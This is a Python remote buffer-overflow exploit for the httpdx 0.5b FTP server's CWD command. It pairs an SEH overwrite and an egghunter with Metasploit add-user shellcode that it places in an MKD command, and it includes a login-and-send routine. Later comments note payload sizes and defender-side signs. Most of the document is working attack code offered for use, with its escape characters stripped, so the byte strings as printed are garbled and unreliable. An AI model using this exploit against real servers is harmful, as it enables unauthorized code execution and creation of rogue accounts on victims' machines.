# Title : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
# Published : 2009-05-19
# Author : His0k4
#!/usr/bin/python
#[*] Usage : httpdx_cwd.py [target_ip] user pass
#[*] Example : httpdx_cwd.py 192.168.1.3 ftp 123
# Stack encouraged me to exploit this bug, so thx brotha
# _ _ _ __ _ _ _
#| || | (_) ___ / | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ __/ |__ |_|
#
#[*] Bug : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
#[*] Refer : sico2819
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
#[*] Serra7 Merra7 koulchi mderra7 :p
#[x] Note : I used the case where IDM is installed, because its DLL (idmmbc.dll) is loaded with httpdx.
import socket,sys,struct
# Print the tool's banner (Python 2 print statements, as in the rest of the
# listing). The escape sequences in this listing have been stripped: the bare
# `n` at the ends of the strings appears to be what is left of a newline
# escape, so the printed text is not exactly what the author intended.
def banner():
print "nhttpdx <= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.n"
print "By: His0k4n"
# Require exactly three positional arguments (ip, user, pass); otherwise show
# the banner and usage text and stop. Note the exit status is 0 even on a
# usage error, so a calling script cannot tell this apart from success.
if len(sys.argv)!=4:
banner()
print "Usage: %s <ip> <user> <pass>" %sys.argv[0]
sys.exit(0)
# skape's egghunter shellcode
# 32 bytes as listed (two lines of 16). The four bytes `x44x7Ax32x37` on the
# second line are the tag the hunter presumably scans memory for; the same
# four bytes open `shellcode` below, repeated twice, which matches the usual
# egghunter convention. As everywhere in this listing, the `x..` tokens are
# stripped escapes, not the raw bytes the author used.
shellunt=(
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x44x7Ax32x37x8bxfaxafx75xeaxafx75xe7xffxe7")
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
# Per the author's comment above: a Metasploit-generated local add-user
# payload (user "dz", 228 bytes, PexFnstenvSub-encoded). With the 8-byte
# egg-tag prefix the blob is 236 bytes; that is the MKD argument sent further
# down, which is the size a defender would key on in FTP logs or a sensor.
shellcode=(
"x44x7Ax32x37x44x7Ax32x37x29xc9x83xe9xcdxd9xeexd9"
"x74x24xf4x5bx81x73x13x05x16xf2x06x83xebxfcxe2xf4"
"xf9xfexb6x06x05x16x79x43x39x9dx8ex03x7dx17x1dx8d"
"x4ax0ex79x59x25x17x19x4fx8ex22x79x07xebx27x32x9f"
"xa9x92x32x72x02xd7x38x0bx04xd4x19xf2x3ex42xd6x02"
"x70xf3x79x59x21x17x19x60x8ex1axb9x8dx5ax0axf3xed"
"x8ex0ax79x07xeex9fxaex22x01xd5xc3xc6x61x9dxb2x36"
"x80xd6x8ax0ax8ex56xfex8dx75x0ax5fx8dx6dx1ex19x0f"
"x8ex96x42x06x05x16x79x6ex39x49xc3xf0x65x40x7bxfe"
"x86xd6x89x56x6dxe6x78x02x5ax7ex6axf8x8fx18xa5xf9"
"xe2x75x9fx62x2bx73x8ax63x25x39x91x26x6bx73x86x26"
"x70x65x97x74x25x72x88x26x37x21xd2x29x44x52xb6x26"
"x23x30xd2x68x60x62xd2x6ax6ax75x93x6ax62x64x9dx73"
"x75x36xb3x62x68x7fx9cx6fx76x62x80x67x71x79x80x75"
"x25x72x88x26x2ax57xb6x42x05x16xf2x06")
# Assemble the CWD argument, which the title says overwrites an SEH record.
# As the author laid it out: 26 filler bytes, the 32-byte egghunter, 4 bytes
# that look like the next-SEH slot, a 4-byte handler address (the note in the
# header ties it to idmmbc.dll, an IDM module loaded with httpdx), then 900
# bytes of padding -- 966 bytes in total, far longer than any real path.
# Mitigation-wise this depends on a loaded module lacking SafeSEH, and on the
# server not bounding the CWD argument; both are the defender's levers.
payload = 'x41'*26
payload += shellunt
payload += 'xEBxDEx90x90'
payload += 'x87x23x02x10'
payload += 'x44'*900
# Delivery over the FTP control channel (port 21): log in with the supplied
# credentials, send the payload as an MKD argument and the overflow string as
# a CWD argument, then wait. Observable from the defender's side: an
# authenticated FTP session whose MKD argument is ~236 bytes and whose CWD
# argument is ~966 bytes. The trailing `rn` on each command is a stripped
# line-terminator escape, like the other escapes in this listing.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((sys.argv[1],21))
except:
# Bare except: also swallows KeyboardInterrupt/SystemExit, and exits with 0.
print "Can't connect to server!n"
sys.exit(0)
# Every server response is read and discarded; nothing checks the reply
# codes, so a failed login or a rejected command does not stop the script.
s.recv(1024)
s.send('USER '+sys.argv[2]+'rn')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'rn')
s.recv(1024)
s.send('MKD '+shellcode+'rn') # i placed the shellcode in the MKD command ;)
s.recv(1024)
s.send('CWD '+payload+'rn')
print ("Egghunter is hunting...;)")
# Blocks until the user presses Enter; per the author, the payload runs when
# httpdx is closed, so the session is held open until then.
raw_input("[+] Shellcode will be executed when httpdx get closed")
s.close()